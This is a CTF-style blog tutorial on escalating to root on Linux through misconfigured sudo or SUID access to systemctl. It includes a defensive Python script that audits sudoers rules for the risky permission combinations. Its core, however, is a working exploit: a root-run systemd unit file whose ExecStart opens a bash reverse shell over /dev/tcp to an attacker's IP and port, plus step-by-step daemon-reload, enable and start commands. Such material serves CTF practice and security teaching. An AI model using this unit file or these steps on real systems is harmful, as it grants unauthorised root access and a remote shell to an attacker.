How-to: systemctl Priv-Esc Exploit

Sudo or SUID Misconfigurations? Easy exploit, explained.


1. Requirements

Case 0: You have permission to run /bin/systemctl via sudo, or the SUID bit is set on it. This is the easiest case to deal with.

Case 1: Permissions (at least):

  • /bin/systemctl daemon-reload
  • /bin/systemctl restart *.service

Case 2: Permissions (at least):

  • /bin/systemctl daemon-reload
  • /bin/systemctl enable *.service -> /bin/systemctl start *.service
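
As an added defender-side check (not code from the original write-up), the script below reads sudoers-style rules and reports which of the three cases above each rule grants, so an auditor can spot the combinations before someone else does. The sudoers lines are constructed sample input; the case names, the regexes and the helper names are my own.

```python
import re
import stat

# Constructed sudoers-style lines (not from any real host) covering the cases above.
SAMPLE_SUDOERS = """\
Defaults env_reset
alice ALL=(root) NOPASSWD: /bin/systemctl
bob   ALL=(root) NOPASSWD: /bin/systemctl daemon-reload, /bin/systemctl restart *.service
carol ALL=(root) NOPASSWD: /bin/systemctl daemon-reload, /bin/systemctl enable *.service, /bin/systemctl start *.service
dave  ALL=(root) NOPASSWD: /bin/systemctl status *.service
"""

# user  host=(runas[:group]) [NOPASSWD:] cmd, cmd, ...   (only root/ALL run-as considered)
RULE_RE = re.compile(r"^(\S+)\s+\S+=\((?:root|ALL)(?::\S+)?\)\s*(?:NOPASSWD:\s*)?(.+)$")
SYSTEMCTL = r"(?:/usr)?/bin/systemctl"

def parse_rules(text):
    """Map each user to the list of commands the rules let them run as root."""
    rules = {}
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            rules.setdefault(m.group(1), []).extend(c.strip() for c in m.group(2).split(","))
    return rules

def _has(cmds, verb_pattern):
    """True if any command is systemctl followed by the given verb pattern."""
    return any(re.fullmatch(rf"{SYSTEMCTL}\s+{verb_pattern}", c) for c in cmds)

def classify(cmds):
    """Return the case from the write-up that the command set matches, or None."""
    if "ALL" in cmds or any(re.fullmatch(SYSTEMCTL, c) for c in cmds):
        return "case0"          # unrestricted systemctl as root
    if not _has(cmds, "daemon-reload"):
        return None             # an edited unit file can never be picked up
    if _has(cmds, r"restart\s+\*\.service"):
        return "case1"
    if _has(cmds, r"enable\s+\*\.service") and _has(cmds, r"start\s+\*\.service"):
        return "case2"
    return None

def audit(text):
    """Return {user: case} for every user whose rules match one of the cases."""
    return {u: c for u, cmds in parse_rules(text).items() if (c := classify(cmds))}

def suid_set(mode):
    """True if the SUID bit is set in an st_mode value (the file-permission form of case 0)."""
    return bool(mode & stat.S_ISUID)

if __name__ == "__main__":
    for user, case in audit(SAMPLE_SUDOERS).items():
        print(f"{user}: {case}")
```

On a real host, feed it the output of `sudo -l` or the contents of /etc/sudoers and /etc/sudoers.d/*, and pass `os.stat("/bin/systemctl").st_mode` to `suid_set`.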

2. Code

Case 0 and Case 1

root.service

[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'

Case 0 and Case 2

root.service

[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
[Install]
WantedBy=multi-user.target

3. Exploiting

Case 0 and Case 1

  1. Edit/transfer the file root.service
  2. Run systemctl daemon-reload
  3. Run systemctl restart root.service

Case 0 and Case 2

  1. Edit/transfer the file root.service
  2. Run systemctl daemon-reload
  3. Run systemctl enable root.service
  4. Run systemctl start root.service

4. Explanation

The root.service file we create here is a systemd unit file describing a service, one that escalates us to root.

Type=simple tells systemd to consider the unit started as soon as the ExecStart=... process has been spawned. User=root specifies that the process runs as root. This is allowed because we are privileged enough to run systemctl commands as root :D

NOTE: The WantedBy line is only required if you want to use the systemctl enable command, that is, to tell the system to load this specific service at boot. Confused?

Here's the thing. When a system boots, the services that have a WantedBy or RequiredBy entry (and have been enabled) are started; services without one are not. Think about it: services with dependencies get resolved, and those without this line are not started simply because nobody requires or wants them. But we are not rebooting the system during a CTF challenge. We can start this service manually with the start command. Thus, there is no need for the WantedBy line!

Check out the error message below, seen when I leave out the [Install] section and use the enable command.

┌──(kali㉿kali)-[/etc/systemd/system]
└─$ sudo systemctl enable root.service
The unit files have no installation config (WantedBy=, RequiredBy=, Also=,
Alias= settings in the [Install] section, and DefaultInstance= for template
units). This means they are not meant to be enabled using systemctl.

...

Thus, include the [Install] section only if you want to use the enable command. Otherwise, it's fine to skip it!

5. References

Originally published at https://chaudhary1337.github.io on July 3, 2021.
